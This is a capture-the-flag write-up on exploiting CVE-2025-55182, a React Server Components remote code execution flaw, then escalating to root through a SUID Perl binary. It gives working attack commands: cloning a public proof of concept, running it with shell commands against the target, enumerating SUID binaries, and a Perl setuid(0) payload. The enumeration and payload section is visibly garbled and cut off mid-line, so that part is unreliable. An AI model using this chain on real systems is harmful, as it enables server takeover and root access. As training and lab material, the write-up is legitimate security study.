## https://sploitus.com/exploit?id=786F41D1-E618-571C-BAA8-1634E7C2B789
# CVE-2025-55182 โ React Server Components RCE | CTF Writeup
> **Category:** Web Exploitation | **Difficulty:** Medium | **Vulnerability:** Remote Code Execution โ SUID Privilege Escalation
---
## TL;DR
React Server Component endpoint vulnerable to CVE-2025-55182 (RCE) โ enumerated SUID binaries โ `/usr/bin/perl` had SUID set โ used Perl's POSIX `setuid(0)` to escalate to root โ read `/root/flag.txt`.
**Flag:** `MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}`
---
## Step 1 โ Reconnaissance
**Target:** `http://challenge.cybermesh.site:30035/`
The target was a React-based web application leveraging **React Server Components (RSC)** โ a relatively new architecture that executes components server-side and streams serialized output back to the client via a custom wire format.
This architecture introduces a server-side execution boundary. Improper input handling at that boundary is exactly what CVE-2025-55182 exploits.
---
## Step 2 โ Vulnerability: CVE-2025-55182
**React Server Components RCE** โ The server fails to sanitize user-controlled input before it reaches the server-side component execution layer. This allows an attacker to inject OS-level shell commands that execute in the context of the Node.js process.
**Attack flow:**
1. Attacker crafts a malicious RSC payload
2. Server deserializes input and passes unsanitized values into a server component function
3. OS command executes, output streamed back in the RSC response
4. Attacker reads command output from the response body
---
## Step 3 โ Exploit Setup
A public PoC exists for this CVE:
```bash
git clone https://github.com/surajhacx/react2shellpoc.git
cd react2shellpoc
```
Initial verification โ confirming RCE and execution context:
```bash
python exploit.py -t http://challenge.cybermesh.site:30035/ -c "whoami"
```
**Output:**
```
[+] EXPLOITATION SUCCESSFUL
โบ app
```
The server runs as user `app`. Not root โ escalation required.
---
## Step 4 โ SUID Enumeration
Scanning for SUID binaries:
```bash
python exploit.py -t http://challenge.cybermesh.site:30035/ \
-c "find /bin /usr/bin /sbin /usr/sbin -perm -4000 2>/dev/null || true"
```
**Output:**
```
[+] EXPLOITATION SUCCESSFUL
โบ /usr/bin/gpasswd
โบ /usr/bin/perl /tmp/p.pl && /usr/bin/perl /tmp/p.pl"
```
**The payload decoded is roughly:**
```perl
use POSIX;
$ENV{PATH}='/bin:/usr/bin';
setuid(0);
open(my $vdC9flag,');
```
**Output:**
```
[+] EXPLOITATION SUCCESSFUL
โบ MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}
```
---
## Flag
```
MCS{P34RLLYYYYYYYYYY_R34CT_C0MP0N3NT_F0R_Y0U_SU1D_AR3_FUN_BUT_N0T_EVERYTIM3}
```
---
## Key Takeaways
**1. RSC attack surface is underestimated.**
React Server Components are a new paradigm. Many deployments haven't been hardened against input injection at the server-component boundary. This CVE is a reminder that "server-side rendering" isn't inherently safe โ the execution boundary still needs proper sanitization.
**2. SUID on scripting runtimes = instant root.**
`/usr/bin/perl` with SUID is a textbook misconfiguration. GTFOBins covers it in detail. Never set the SUID bit on scripting languages (Perl, Python, Ruby, etc.) โ unlike compiled binaries designed for SUID (su, passwd), these runtimes offer trivial escalation paths.
**3. The flag is self-aware.**
`SU1D_AR3_FUN_BUT_N0T_EVERYTIM3` โ the challenge was explicitly designed around SUID Perl as the intended escalation path. Clean chain.
---
## Attack Chain Summary
```
CVE-2025-55182 (RSC RCE)
โโ> whoami โ user "app"
โโ> find SUID binaries
โโ> /usr/bin/perl (SUID root) identified
โโ> base64 Perl payload โ write to /tmp/p.pl
โโ> SUID perl /tmp/p.pl โ setuid(0) โ cat /root/flag.txt
โโ> FLAG โ
```
---
## References
- [github.com/surajhacx/react2shellpoc](https://github.com/surajhacx/react2shellpoc)
- [GTFOBins โ perl SUID](https://gtfobins.github.io/gtfobins/perl/)
- [NVD โ CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
---
*Written by Abdullah Maqbool โ Penetration Testing Engineer @ TISS | CRTA ยท CRTOM ยท CompTIA PenTest+*